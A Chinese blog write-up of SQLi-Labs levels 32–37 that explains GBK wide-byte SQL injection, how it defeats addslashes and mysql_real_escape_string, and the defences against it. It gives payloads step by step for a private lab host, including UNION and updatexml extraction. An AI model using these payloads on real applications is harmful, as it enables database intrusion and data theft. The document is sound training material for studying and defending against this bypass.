SqliLab_Mysql_Injection详解_字符型注入(十一)_宽字节注入(32~37)

最新推荐文章于 2022-09-13 22:58:40 发布
最新推荐文章于 2022-09-13 22:58:40 发布
阅读量704 收藏 5
点赞数 1
分类专栏: # MYSQL注入学习 文章标签: 宽字节注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41260930/article/details/102855182
版权

文章目录

1. SqliLab_Mysql_Injection详解_字符型注入(十一)
1.1. SQL注入_宽字节注入
1.2. 原理
  • GBK编码规则:GBK编码,编码的范围为 8140-FEFE,首字节在 81-FE 之间,尾字节在 40-FE 之间,字符 \ 的ASCII码为5C,在其低位范围内,就可能被转换为一个服务器数据库不识别的汉字,并且能和它组合的字符不仅只有0xdf,%815c/%825c/%835c等都可以进行宽字节注入;
  • Mysql在使用GBK编码的时候,会认为两个字符为一个汉字,所以可以使用一些字符和,经过转义过后多出来的’'组合成两个字符,这个时候mysql数据库不识别字符,导致对单引号、双引号的转义失败,使其参数闭合;
1.3. 宽字节注入的形成过程
  • 使用PHP连接mysql时,当设置“set character_set_client=gbk”时会导致GBK编码转换的问题,当注入的参数里面带%df%27时,在魔术引号开关或者addslashes()函数(在特殊字符前加上转义号‘\’(%5c))的作用下,会将%df%27转换为%df%5c%27,此时%df%5c在服务端中解析后是一个汉字,数据库不识别该汉字,使得原本要被反斜杠转义的单引号,由于新加的字符和反斜杠组合成为了一个不被数据库识别的汉字,导致不会被转义(转义失效),进而成功闭合参数,可以使用(%bf,%df,%815c/%825c/%835c等);
    -有时候为了避免漏洞,网站数据库一般会设置UTF-8编码,然后进行转义过滤。但是由于一些不经意的字符集转换,又会导致漏洞出现;使用set NAMEs 'UTF-8’指定了UTF-8字符集,并且也使用转义函数进行转义。有时候,为了避免乱码,会将一些用户提交的GBK字符使用iconv()函数(字符串编码格式转换)先转换为UTF-8,然后再拼接入SQL语句。
    EG:
  • %e5%5c转换成UTF-8为e9%8c%a6;
  • %e5%5c%27经过addslashes()函数转变为(%e5%5c%5c%5c%27),在通过iconv()函数转换为(%e9%8c%a6%5c%5c%27),由于%5c为反斜杠,即为(%e9%8c%a6\%27),这里通过编码转换多出了一个%5c(反斜杠),将转义符(反斜杠)本身转义(转义失效),使得后面的%27单引号发挥了作用(成功闭合参数);
1.4. 宽字节注入漏洞的形成原因

在PHP连接mysql的时候执行了如下设置:

  • set character_set_client=gbk
  • set NAMES ‘GBK’ #等同于
    set character_set_connection=‘gbk’
    set character_set_results=‘gbk’
    set character_set_client=gbk
  • mysql_set_charset(‘gbk’) #还是调用的set NAMES
1.5. 宽字节注入的防御
  • 在执行查询前先执行SET NAMES ‘gbk’ ,character_set_client=binary,设置character_set_client为binary(incov函数的乱用还是会造成宽字节注入);
  • 使用mysql_set_charset(‘gbk’)设置编码,然后使用mysql_real_escape_string()函数对参数过滤(mysql_real_escape_string()与addslashes 的不同之处在于其会考虑当前设置的字符集);
  • 使用PDO方式,在PHP5.3.6及以下版本需要设置setAttrribute(PDO::ATTR_EMULATE_PREPARES,false),来禁用preparedsttatements的仿真效果;
2. SqliLab关卡(包含32,33,34,35,36,37)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中)
2.1. SqliLab-32(宽字节注入(单引号闭合)):
2.1.1. 初始界面

在这里插入图片描述

2.1.2. 判断注入点(关键步骤)

观察发现是GET型数据传送,参数为(id),尝试对其进行注入点判断(一般闭合字符是从单引号,双引号开始);
EG:

http://192.168.1.104/sql/Less-32/?id=1 and 1=1 --+
//服务器返回正确(预期正确),尝试使用(1=2)进行构造;
http://192.168.1.104/sql/Less-32/?id=1 and 1=2 --+
//服务器返回正确(预期错误),尝试使用(')替换()进行构造;
http://192.168.1.104/sql/Less-32/?id=1' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造语句中的单引号(')被加上了反斜杠(\),尝试使用(%bf)组合单引号,进行进行构造;
http://192.168.1.104/sql/Less-32/?id=1%bf' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造的单引号前存在一个未被数据库识别的字符,尝试使用(1=2)进行构造,判断是否单引号是否被转义;
http://192.168.1.104/sql/Less-32/?id=1%bf' and 1=2 --+
//服务器返回错误(预期错误),判断参数(id)存在注入,闭合字符为(');

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
判断是否存在SQL语句报错提示
EG:

http://192.168.1.104/sql/Less-32/?id=1%df'))) and 1=1 --+
//服务器返回页面错误,同时发现存在SQL语句报错提示;
//经过判断,存在SQL语句报错提示;

经过对参数(id)测试,发现参数(id)存在注入,闭合字符为(’),后台能对特殊字符进行转义,在特殊字符前添加(%bf)(观察后台源码可以发现存在preg_replace()函数),使其转义失效,同时发现服务器返回页面存在回显和SQL语句报错提示,可以考虑使用UNION联合查询或者报错注入的方式来获取数据库信息,下面进行测试;

2.1.3. 使用UNION联合查询获取数据库信息

EG:

...
http://192.168.1.104/sql/Less-32/?id=1%bf'order by 1,2,3,4 --+
//服务器返回页面错误,判断出字段数为(3),使用union联合查询获取信息;
http://192.168.1.104/sql/Less-32/?id=0%df'union select 1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),2 --+
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...
2.1.4. 使用报错注入获取数据库信息

EG:

http://192.168.1.104/sql/Less-32/?id=0%df'and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),1) --+
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

获取其他信息的方法如上面示例的一样,至此,SqliLab-32结束;

2.2. SqliLab-33(宽字节注入(单引号闭合)):
2.2.1. 初始界面

2.2.2. 判断注入点(关键步骤)

观察发现是GET型数据传送,参数为(id),尝试对其进行注入点判断(一般闭合字符是从单引号,双引号开始);
EG:

http://192.168.1.104/sql/Less-33/?id=1 and 1=1 --+
//服务器返回正确(预期正确),尝试使用(1=2)进行构造;
http://192.168.1.104/sql/Less-33/?id=1 and 1=2 --+
//服务器返回正确(预期错误),尝试使用(')替换()进行构造;
http://192.168.1.104/sql/Less-33/?id=1' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造语句中的单引号(')被加上了反斜杠(\),尝试使用(%bf)组合单引号,进行进行构造;
http://192.168.1.104/sql/Less-33/?id=1%bf' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造的单引号前存在一个未被数据库识别的字符,尝试使用(1=2)进行构造,判断是否单引号是否被转义;
http://192.168.1.104/sql/Less-33/?id=1%bf' and 1=2 --+
//服务器返回错误(预期错误),判断参数(id)存在注入,闭合字符为(');

判断是否存在SQL语句报错提示
EG:

http://192.168.1.104/sql/Less-33/?id=1%df'))) and 1=1 --+
//服务器返回页面错误,同时发现存在SQL语句报错提示;
//经过判断,存在SQL语句报错提示;

经过对参数(id)测试,发现参数(id)存在注入,闭合字符为(’),后台能对特殊字符进行转义,在特殊字符前添加(%bf)(观察后台源码可以发现存在addslashes()函数),使其转义失效,同时发现服务器返回页面存在回显和SQL语句报错提示,可以考虑使用UNION联合查询或者报错注入的方式来获取数据库信息,下面进行测试;

2.2.3. 使用UNION联合查询获取数据库信息

EG:

...
http://192.168.1.104/sql/Less-33/?id=1%bf'order by 1,2,3,4 --+
//服务器返回页面错误,判断出字段数为(3),使用union联合查询获取信息;
http://192.168.1.104/sql/Less-33/?id=0%df'union select 1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),2 --+
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...
2.2.4. 使用报错注入获取数据库信息

EG:

http://192.168.1.104/sql/Less-33/?id=0%df'and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),1) --+
//服务器返回页面错误,同时发现SQL语句报错提示显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

获取其他信息的方法如上面示例的一样,至此,SqliLab-33结束;

2.3. SqliLab-34(POST型_宽字节注入(单引号闭合)):
2.3.1. 初始界面

在这里插入图片描述

2.3.2. 判断注入点(关键步骤)

观察发现是POST型数据传送,通过浏览器的开发者工具发现传送,参数为(uname)和(passwd)以及(submit=Submit),尝试对其中的参数进行注入点判断(一般闭合字符是从单引号,双引号开始);
EG:

uname=1 or 1=1 %23&passwd=1&submit=Submit
//服务器返回错误(预期正确),尝试使用(')替换()进行构造;
uname=1' or 1=1 %23&passwd=1&submit=Submit
//服务器返回错误(预期正确),同时发现构造语句中的单引号(')被加上了反斜杠(\),尝试使用(%bf)组合单引号,进行进行构造;
uname=a%bf' or 1=1 %23&passwd=a&submit=Submit
//服务器返回正确(预期正确),判断出(%bf)可以使单引号转义失效,尝试使用(1=2)进行构造,判断是否是注入点;
uname=a%bf' or 1=2 %23&passwd=a&submit=Submit
//服务器返回错误(预期错误),判断参数(id)存在注入,闭合字符为(');

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
判断是否存在SQL语句报错提示
EG:

uname=a%bf'))) or 1=1 %23&passwd=a&submit=Submit
//服务器返回页面错误,同时发现存在SQL语句报错提示;
//经过判断,存在SQL语句报错提示;

经过对参数(id)测试,发现参数(id)存在注入,闭合字符为(’),后台能对特殊字符进行转义,在特殊字符前添加(%bf)(观察后台源码可以发现存在addslashes()函数),使其转义失效,同时发现服务器返回页面存在回显和SQL语句报错提示,可以考虑使用UNION联合查询或者报错注入的方式来获取数据库信息,下面进行测试;

2.3.3. 使用UNION联合查询获取数据库信息

EG:

...
uname=a%bf' order by 1,2,3 %23&passwd=a&submit=Submit
//服务器返回页面错误,判断出字段数为(2),使用union联合查询获取信息;
uname=a%df'union select 1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c) %23&passwd=a&submit=Submit
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

在这里插入图片描述

2.3.4. 使用报错注入获取数据库信息

EG:

uname=a%df'and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),1) %23&passwd=a&submit=Submit
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

在这里插入图片描述
获取其他信息的方法如上面示例的一样,至此,SqliLab-34结束;

2.4. SqliLab-35(数字型_宽字节注入(无闭合字符)):
2.4.1. 初始界面

在这里插入图片描述

2.4.2. 判断注入点(关键步骤)

观察发现是GET型数据传送,参数为(id),尝试对其进行注入点判断(一般闭合字符是从单引号,双引号开始);
EG:

http://192.168.1.104/sql/Less-35/?id=1 and 1=1 --+
//服务器返回正确(预期正确),尝试使用(1=2)进行构造;
http://192.168.1.104/sql/Less-33/?id=1 and 1=2 --+
//服务器返回错误(预期错误),判断参数(id)存在注入,无闭合字符;

判断是否存在对特殊字符的转义
EG:

http://192.168.1.104/sql/Less-35/?id=1' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造语句中的单引号(')被加上了反斜杠(\),尝试使用(%bf)组合单引号,进行进行构造;
http://192.168.1.104/sql/Less-35/?id=1%bf' and 1=1 --+
//服务器返回错误(预期错误),发现单引号未被转义;
//经过判断,存在对特殊字符的转义;

判断是否存在SQL语句报错提示
EG:

http://192.168.1.104/sql/Less-35/?id=1))) and 1=1 --+
//服务器返回页面错误,同时发现存在SQL语句报错提示;
//经过判断,存在SQL语句报错提示;

经过对参数(id)测试,发现参数(id)存在注入,无闭合字符(数字型注入),后台能对特殊字符进行转义,在特殊字符前添加(%bf)(观察后台源码可以发现存在addslashes()函数),使其转义失效,同时发现服务器返回页面存在回显和SQL语句报错提示,可以考虑使用UNION联合查询或者报错注入的方式来获取数据库信息,下面进行测试;

2.4.3. 使用UNION联合查询获取数据库信息

EG:

...
http://192.168.1.104/sql/Less-35/?id=1 order by 1,2,3,4 --+
//服务器返回页面错误,判断出字段数为(3),使用union联合查询获取信息;
http://192.168.1.104/sql/Less-35/?id=0 union select 1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),2 --+
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...
2.4.4. 使用报错注入获取数据库信息

EG:

http://192.168.1.104/sql/Less-35/?id=1 and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),1) --+
//服务器返回页面错误,同时发现SQL语句报错提示显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

获取其他信息的方法如上面示例的一样,至此,SqliLab-35结束;

2.5. SqliLab-36(宽字节注入(单引号闭合)):
2.5.1. 初始界面

在这里插入图片描述

2.5.2. 判断注入点(关键步骤)

观察发现是GET型数据传送,参数为(id),尝试对其进行注入点判断(一般闭合字符是从单引号,双引号开始);
EG:

http://192.168.1.104/sql/Less-36/?id=1 and 1=1 --+
//服务器返回正确(预期正确),尝试使用(1=2)进行构造;
http://192.168.1.104/sql/Less-36/?id=1 and 1=2 --+
//服务器返回正确(预期错误),尝试使用(')替换()进行构造;
http://192.168.1.104/sql/Less-36/?id=1' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造语句中的单引号(')被加上了反斜杠(\),尝试使用(%bf)组合单引号,进行进行构造;
http://192.168.1.104/sql/Less-36/?id=1%bf' and 1=1 --+
//服务器返回正确(预期正确),同时发现构造的单引号前存在一个未被数据库识别的字符,尝试使用(1=2)进行构造,判断是否单引号是否被转义;
http://192.168.1.104/sql/Less-36/?id=1%bf' and 1=2 --+
//服务器返回错误(预期错误),判断参数(id)存在注入,闭合字符为(');

判断是否存在SQL语句报错提示
EG:

http://192.168.1.104/sql/Less-36/?id=1%df'))) and 1=1 --+
//服务器返回页面错误,同时发现存在SQL语句报错提示;
//经过判断,存在SQL语句报错提示;

经过对参数(id)测试,发现参数(id)存在注入,闭合字符为(’),后台能对特殊字符进行转义,在特殊字符前添加(%bf)(观察后台源码可以发现存在mysql_real_escape_string()函数),使其转义失效,同时发现服务器返回页面存在回显和SQL语句报错提示,可以考虑使用UNION联合查询或者报错注入的方式来获取数据库信息,下面进行测试;

2.5.3. 使用UNION联合查询获取数据库信息

EG:

...
http://192.168.1.104/sql/Less-36/?id=1%bf'order by 1,2,3,4 --+
//服务器返回页面错误,判断出字段数为(3),使用union联合查询获取信息;
http://192.168.1.104/sql/Less-36/?id=0%df'union select 1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),2 --+
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...
2.5.4. 使用报错注入获取数据库信息

EG:

http://192.168.1.104/sql/Less-36/?id=0%df'and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),1) --+
//服务器返回页面错误,同时发现SQL语句报错提示显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

获取其他信息的方法如上面示例的一样,至此,SqliLab-36结束;

2.6. SqliLab-37(POST型_宽字节注入(单引号闭合)):
2.6.1. 初始界面

在这里插入图片描述

2.6.2. 判断注入点(关键步骤)

观察发现是POST型数据传送,通过浏览器的开发者工具发现传送,参数为(uname)和(passwd)以及(submit=Submit),尝试对其中的参数进行注入点判断(一般闭合字符是从单引号,双引号开始);
EG:

uname=1 or 1=1 %23&passwd=1&submit=Submit
//服务器返回错误(预期正确),尝试使用(')替换()进行构造;
uname=1' or 1=1 %23&passwd=1&submit=Submit
//服务器返回错误(预期正确),同时发现构造语句中的单引号(')被加上了反斜杠(\),尝试使用(%bf)组合单引号,进行进行构造;
uname=a%bf' or 1=1 %23&passwd=a&submit=Submit
//服务器返回正确(预期正确),判断出(%bf)可以使单引号转义失效,尝试使用(1=2)进行构造,判断是否是注入点;
uname=a%bf' or 1=2 %23&passwd=a&submit=Submit
//服务器返回错误(预期错误),判断参数(id)存在注入,闭合字符为(');

判断是否存在SQL语句报错提示
EG:

uname=a%bf'))) or 1=1 %23&passwd=a&submit=Submit
//服务器返回页面错误,同时发现存在SQL语句报错提示;
//经过判断,存在SQL语句报错提示;

经过对参数(id)测试,发现参数(id)存在注入,闭合字符为(’),后台能对特殊字符进行转义,在特殊字符前添加(%bf)(观察后台源码可以发现存在mysql_real_escape_string()函数),使其转义失效,同时发现服务器返回页面存在回显和SQL语句报错提示,可以考虑使用UNION联合查询或者报错注入的方式来获取数据库信息,下面进行测试;

2.6.3. 使用UNION联合查询获取数据库信息

EG:

...
uname=a%bf'order by 1,2,3 %23&passwd=a&submit=Submit
//服务器返回页面错误,判断出字段数为(2),使用union联合查询获取信息;
uname=a%df'union select 1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c) %23&passwd=a&submit=Submit
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...
2.6.4. 使用报错注入获取数据库信息

EG:

uname=a%df'and updatexml(1,concat(0x7c,database(),0x7c,version(),0x7c,user(),0x7c),1) %23&passwd=a&submit=Submit
//服务器返回页面正确,发现显示了当前数据库名为(security),MySQL版本为(5.5.53),用户为(root@);
...

获取其他信息的方法如上面示例的一样,至此,SqliLab-37结束;

3. 总结

经过测试发现,这几种函数addslashes()、mysql_real_escape_string()、replace()都存在有类似的绕过方式(在特殊字符前添加%bf,%df,%815c,%825c,%835c等使其转义失效然后绕过),对于宽字节注入的绕过等还是要从编码下手,不管是GBK转换UTF-8 ,还是UTF-8 转换GBK,都会由于编码的问题产生宽字节注入,防御最好采用预编译的方式,最后老话长谈,还是注重于注入点的判断,GET型直接构造payload,POST型需要抓包改包(在数据包中构造payload),使用注入的方式取决于注入点时收集的信息的多与少。

[如有错误,请指出,拜托了<( _ _ )> !!!]

Tes789123456
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试之sqlilab基础(二)Sql注入
LKmnbZ's Blog
11-06 778
1. sql注入的常见漏洞类 Web phpmyadmin Client navicat 详见https://www.mrwu.red/web/1422.html Mysql 安全配置 参考https://www.jianshu.com/p/7dcaf4c616b0 Mysql 本身漏洞 Cve-2012-2122 h...
sqli-labs Less-32、33、34、35、36、37sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
m0_54899775的博客
12-26 1788
sqli-labs Less-32、33、34、35、36、37sqli-labs闯关指南 32、33、34、35、36、37)—宽字节注入
sqli-宽字节注入
weixin_47346400的博客
03-16 156
以下ppt来自大佬传送门 宽字节注入原理 初步探测: http://sqli-labs:65/Less-32/?id=1'-- 发现1’被转义为 ''所以判定为 宽字节注入 方法:在注入点后键入%df,然后按照正常的注入流程开始注入 原理:下图中的hint == -1�’ union select 1,2,(select user())-- ==、由于和源代码中的 ‘$id’产生闭合,所以就自然执行了 union select… 已知mysql注入的类是宽字节了,下面就按照注入的基本
SQL注入-09】宽字节注入案例—以sqli-labs-less32为例
m0_64378913的博客
05-01 2493
符号 GBK编码 ’ 27
sqli-labs大详解
gankjk的博客
10-19 6589
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
sqli-lab(11)
qq_53030229的博客
05-03 596
文章目录一、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取username、password 一、判断注入点 首先,我们使用burpsuit抓包,个人认为这样比较方便吧,你们也可以使用其他方式,基本过程都一样 二、判断回显字段 这里回显字段是有两个,看下图,如果回显字段为3时,响应显示报错,字段为2是则没有报错 三、获取数据库 uname=1234'union select 1,updatexml(1,concat(0x7e,(select database()),0x7e
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 701
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
MYSQL注入天书之宽字节注入
Xor0ne
07-14 170
本文来自: Background-7 宽字节注入 Less-32,33,34,35,36,37六关全部是针对’和\的过滤,所以我们放在一起来进行讨论。 对宽字节注入的同学应该对这几关的bypass方式应该比较了解。我们在此介绍一下宽字节注入的原理和基本用法。 原理: mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思路是将 ’ 转换为 ’ (转换的函数或者思路会在每一关遇到的时候介绍)
SqliLab_Mysql_Injection详解_字符注入(十二)_堆叠注入_POST/二次/报错注入/布尔/时间盲注(38~45)
qq_41260930的博客
11-01 418
1. SqliLab_Mysql_Injection详解_字符注入(十二) 1.1. SQL注入_堆叠注入 1.2. 原理 堆叠注入与受限于select语句的联合查询法(字段数的多少)相反,堆叠注入可用于执行任意数量的SQL语句或过程。相当于是就是mysql的多语句查询。 1.3. 限制条件 堆叠注入并不是在任何环境下都可以执行的,可能受到API或数据库引擎不支持的限制(如Oracle数据库)...
SqliLab_Mysql_Injection详解_字符注入(三)_布尔盲注/报错注入(6)
qq_41260930的博客
10-20 559
SqlLab_Mysql_Injection详解_字符注入(四) SQL注入_布尔盲注 SQL注入_报错注入 原理 由于服务器在接受请求后,返回的页面存在报错提示的情况,可以使用一些特殊的函数在特殊的情况下,返回所想要获取的数据库信息; 常用的函数: UPDATEXML(XML_document,XPath_string,new_value)函数 第一个参数XML_document:XML_d...
sqli-lab11和17关详解
cangyu51462的博客
04-26 1804
sqli-lab11和17关详解
sqlilab 38-45 之看不懂教程
跳房子的博客
01-25 444
第三十八关: 这一关过关实在是有点简单,用第一关的方法,联合查询就能爆出所有的内容,然而,这么简单这么会放到三十八关来?没学到新东西我做它干嘛??? 先给个通关的payload:id=0' union select 1,group_concat(schema_name),3 from information_schema.schemata -- # 通过查询。。。这关可以用堆叠注入 堆叠注...
sqlilab 18-19之看不懂的教程
跳房子的博客
01-20 1128
第十八关:通过借鉴各种大佬的题解,最后还是一知半解,这里只说明方法(本人还没有完全吃透所以不了解为什么); 首先用正确的账号密码登录后发现页面回显了你的User-Agent,可以猜测能从User-Agent进行注入,查看源码之后果然可以~; 接下来是用burp软件进行抓包修改User-Agent,我这里就直接上语句吧; 数据库名:User-Agent: Hyafinthus' or upda...
SqliLab_Mysql_Injection详解_字符注入(九)_过滤绕过_二次注入(23~28a)
qq_41260930的博客
10-31 926
1. SqliLab_Mysql_Injection详解_字符注入(九) 1.1. SQL注入_过滤绕过 1.2. 绕过姿势 1.2.1. 开启GPC**后一些绕过姿势: 单引号被转义: 1.2.2. 字符编码问题导致绕过: 设置数据库字符为gbk导致宽字节注入 //%df和%5c(\); 使用icon和mb_convert_encoding转码函数导致宽字节注入; 1.2.3. 编码解...
SQL注入原理-字符注入
最新发布
T1ngSh0w的博客
09-13 9017
SQL注入原理-字符注入
sqli-labs/less-24;宽字节注入
xiaochenhang的博客
08-18 337
2、 当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体字“連”,所以这时,单引号成功逃逸。1、在使用gbk的编码情况下,一个中文占了两个字节;中文的第一个字节加上被转义的特殊字符(\')后,转义符\会被认为是中文的第二个字节,这样单引号'就脱离了转义,形成了宽字节注入;这个语句没问题,可是'security' 两侧单引号也会被转义,这里使用嵌套查询来逃逸;4、联合查询,判断回显点;...
sqlilab 29-37 之看不懂的教程
跳房子的博客
01-24 487
第二十九关: 呼!前面的超级恶心的再也不想遇见的各种过滤题总算是告一段落,不过个人感觉后面还是会有,不多扯,来看这一题 首先题目提示了一个关键词  WAF,哈?这是什么玩意,对于我这个第一次接触的萌新来说,吓得我立刻就去百度-。- 那么接下来就是我经过粗糙理解后的结论: 服务器端是由一个tomcat引擎的jsp服务器和一个apache引擎的php服务器组成的,我们发送的数据会先被jsp服务...
sqlilabs21-37详细教程
黑白的博客
11-01 1325
声明 学习SQL注入,提高网路安全能力,其实大部分环境下,测试人员做的工作都截止到漏洞发现,简单回顾一下,漏洞发现的实质就是发现SQL语句的闭合方式,一般来讲都围绕着这几个符号 双引号 " 单引号 ’ 双引号括号 "( 单引号括号’( 实际运用过程如下,仔细观察服务器给的反馈,或者结合sleep函数进行使用 http://192.168.239.138:86/Less-9/?id=" --+ http://192.168.239.138:86/Less-9/?id=' --+ http://192.168.
③基于字符SQL注入
熊俊坤的博客
10-24 9907
基于字符SQL注入
"实战应用:传智播客MySQL_C_API编程实践
MySQL_C_API 是一种用于连接到数据库和执行数据库查询的库文件,包含在 mysqlclient 库文件中,并与 MySQL 的源代码一起发行。在这份文档中,我们将使用 MySQL_C_API 来编写一个简单的 helloWorld 应用程序,以轻松...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值